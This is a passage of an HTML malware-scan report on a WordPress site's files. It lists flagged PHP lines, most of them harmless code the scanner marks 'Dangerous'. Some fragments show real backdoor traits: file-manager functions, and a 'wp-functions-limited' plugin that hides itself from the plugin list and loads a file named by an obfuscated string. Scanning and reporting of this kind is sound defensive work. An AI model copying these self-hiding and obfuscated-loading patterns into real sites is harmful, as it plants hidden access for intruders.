<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$sall</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">" " </span><span style="color: #007700">. </span><span style="color: #0000BB">$a</span><span style="color: #007700">[</span><span style="color: #0000BB">$pos</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'litespeed_request_headers'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alertcup</span><span style="color: #007700">(</span><span style="color: #0000BB">$m</span><span style="color: #007700">, </span><span style="color: #0000BB">$c</span><span style="color: #007700">, </span><span style="color: #0000BB">$r </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 158</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cext</span><span style="color: #007700">(</span><span style="color: #0000BB">$a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'<i class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$icon</span><span style="color: #007700">[</span><span style="color: #DD0000">'icon'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'" style="color:' </span><span style="color: #007700">. </span><span style="color: #0000BB">$icon</span><span style="color: #007700">[</span><span style="color: #DD0000">'color'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"></i>'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imunify360_request_headers'</span><span style="color: #007700">) && </span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'IMUNIFY360_VERSION'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'apache_request_headers'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 379</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deleteDirectory</span><span style="color: #007700">(</span><span style="color: #0000BB">$cup</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$cup</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">win</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">acup</span><span style="color: #007700">(</span><span style="color: #0000BB">$sky</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$str</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">tea</span><span style="color: #007700">(</span><span style="color: #0000BB">$sky</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">writable</span><span style="color: #007700">(</span><span style="color: #0000BB">$cup</span><span style="color: #007700">, </span><span style="color: #0000BB">$pall</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (!</span><span style="color: #0000BB">is_writable</span><span style="color: #007700">(</span><span style="color: #0000BB">$cup</span><span style="color: #007700">)) ? </span><span style="color: #DD0000">"<font color=\"#DC4C64\">" </span><span style="color: #007700">. </span><span style="color: #0000BB">$pall </span><span style="color: #007700">. </span><span style="color: #DD0000">"</font>" </span><span style="color: #007700">: </span><span style="color: #DD0000">"<font color=\"#14A44D\">" </span><span style="color: #007700">. </span><span style="color: #0000BB">$pall </span><span style="color: #007700">. </span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">pall</span><span style="color: #007700">(</span><span style="color: #0000BB">$cup</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 934</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mime_content_type'</span><span style="color: #007700">) ? </span><span style="color: #0000BB">mime_content_type</span><span style="color: #007700">(</span><span style="color: #0000BB">$item</span><span style="color: #007700">) : </span><span style="color: #0000BB">filetype</span><span style="color: #007700">(</span><span style="color: #0000BB">$item</span><span style="color: #007700">)) </span><span style="color: #0000BB">?></span></td></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 985</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 992</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">salin</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 527</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_539").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-form-7/admin/.htaccess</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_540" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">comdofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">connects</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">copypaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">delpaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">doiconvs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">epinyins</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">filefuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">gdftps</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hplfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">memberfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">moddofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">onclickfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">phpzipincs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qfunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">schallfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">tempfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">userfu</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_540").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-functions-limited/wp-functions-limited.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.44 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-20 23:18:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-20 23:18:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_541" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$d</span><span style="color: #007700">; } function </span><span style="color: #0000BB">era_ajax_handler</span><span style="color: #007700">() { require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">) . </span><span style="color: #0000BB">cin</span><span style="color: #007700">(</span><span style="color: #DD0000">'JEJWJUJVJQJOIDJEJUJU'</span><span style="color: #007700">, </span><span style="color: #0000BB">373</span><span style="color: #007700">); die(); } if (</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'ABSPATH'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'pre_current_active_plugins'</span><span style="color: #007700">, </span><span style="color: #DD0000">'tyf_scx'</span><span style="color: #007700">); </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">(</span><span style="color: #DD0000">'all_plugins'</span><span style="color: #007700">, </span><span style="color: #DD0000">'zhk_ngg'</span><span style="color: #007700">); </span><span style="color: #0000BB">add_action</span><span style="color: #007700">(</span><span style="color: #DD0000">'wp_ajax_f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">tyf_scx</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">-</span><span style="color: #0000BB">limited</span><span style="color: #007700">/</span><span style="color: #0000BB">wp</span><span style="color: #007700">-</span><span style="color: #0000BB">functions</span><span style="color: #007700">-</span><span style="color: #0000BB">limited</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #DD0000">');</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">zhk_ngg</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugins</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">-</span><span style="color: #0000BB">limited</span><span style="color: #007700">/</span><span style="color: #0000BB">wp</span><span style="color: #007700">-</span><span style="color: #0000BB">functions</span><span style="color: #007700">-</span><span style="color: #0000BB">limited</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$plugins</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions Limited</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cin</span><span style="color: #007700">(</span><span style="color: #0000BB">$q</span><span style="color: #007700">, </span><span style="color: #0000BB">$y</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$d</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">era_ajax_handler</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_541").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/revslider/includes/page-template.class.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:36</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_542" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file</span><span style="color: #007700">; } else { echo </span><span style="color: #0000BB">$file</span><span style="color: #007700">; } return </span><span style="color: #0000BB">$template</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$templates</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_project_templates</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$atts</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">view_project_template</span><span style="color: #007700">( </span><span style="color: #0000BB">$template </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 149</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$template</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 165</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an instance of this </span><span style="color: #007700">class.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_project_templates_new</span><span style="color: #007700">( </span><span style="color: #0000BB">$post_templates </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
